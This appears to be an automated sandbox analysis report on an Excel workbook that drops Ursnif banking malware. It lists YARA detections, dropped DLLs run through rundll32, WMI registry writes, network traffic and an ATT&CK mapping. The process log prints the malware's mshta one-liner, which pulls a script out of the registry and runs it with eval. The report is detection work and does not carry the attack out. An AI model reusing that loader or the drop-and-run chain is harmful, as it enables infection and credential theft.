            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://onedrive.live.com
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://onedrive.live.com/embed?
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://outlook.office.com/
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://outlook.office365.com/
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://powerlift.acompli.net
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://settings.outlook.com
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://shell.suite.office.com:1443
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://skyapi.live.net/Activity/
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://staging.cortana.ai
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://store.office.cn/addinstemplate
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://store.office.com/addinstemplate
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://store.office.de/addinstemplate
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://tasks.office.com
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://templatelogging.office.com/client/log
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://web.microsoftstream.com/video/
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://webshell.suite.office.com
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://wus2-000.contentsync.
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://www.odwebp.svc.ms
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownHTTPS traffic detected: 162.241.169.26:443 -> 192.168.2.3:49731 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000001.00000003.484929367.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.484909959.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.491441332.0000000005B6B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.484870003.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.484795532.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.484765467.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.484838302.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.484894517.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.484953925.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7104, type: MEMORY

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000001.00000003.484929367.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.484909959.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.491441332.0000000005B6B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.484870003.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.484795532.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.484765467.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.484838302.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.484894517.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.484953925.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7104, type: MEMORY

            System Summary:

            barindex
            Office process drops PE fileShow sources
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\11[1].dllJump to dropped file
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\ProgramData\fsh\87.dllJump to dropped file
            Writes registry values via WMIShow sources
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
            Source: classification engineClassification label: mal100.troj.expl.winXLSB@11/20@12/3
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{F1020262-3A5E-4343-9586-95E15C7BFAD3} - OProcSessId.datJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\fsh\87.dll,DllRegisterServer
            Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
            Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\fsh\87.dll,DllRegisterServer
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2288 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2288 CREDAT:82952 /prefetch:2
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2288 CREDAT:17430 /prefetch:2
            Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\fsh\87.dll,DllRegisterServerJump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2288 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2288 CREDAT:82952 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2288 CREDAT:17430 /prefetch:2Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: File_78476.xlsbInitial sample: OLE zip file path = docProps/thumbnail.wmf
            Source: File_78476.xlsbInitial sample: OLE zip file path = xl/media/image1.png
            Source: File_78476.xlsbInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
            Source: Binary string: c:\Campenergy\wouldShoulder\learnable\motion.pdb source: 11[1].dll.0.dr
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\11[1].dllJump to dropped file
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\ProgramData\fsh\87.dllJump to dropped file
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\ProgramData\fsh\87.dllJump to dropped file

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000001.00000003.484929367.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.484909959.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.491441332.0000000005B6B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.484870003.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.484795532.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.484765467.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.484838302.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.484894517.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.484953925.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7104, type: MEMORY
            Source: C:\Windows\SysWOW64\rundll32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\11[1].dllJump to dropped file
            Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
            Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior

            Stealing of Sensitive Information:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000001.00000003.484929367.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.484909959.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.491441332.0000000005B6B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.484870003.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.484795532.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.484765467.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.484838302.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.484894517.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.484953925.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7104, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000001.00000003.484929367.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.484909959.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.491441332.0000000005B6B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.484870003.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.484795532.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.484765467.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.484838302.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.484894517.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.484953925.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7104, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation1Path InterceptionProcess Injection1Masquerading1OS Credential DumpingQuery Registry1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsCommand and Scripting Interpreter1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsExploitation for Client Execution4Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerSystem Information Discovery12SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol5SIM Card SwapCarrier Billing Fraud

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet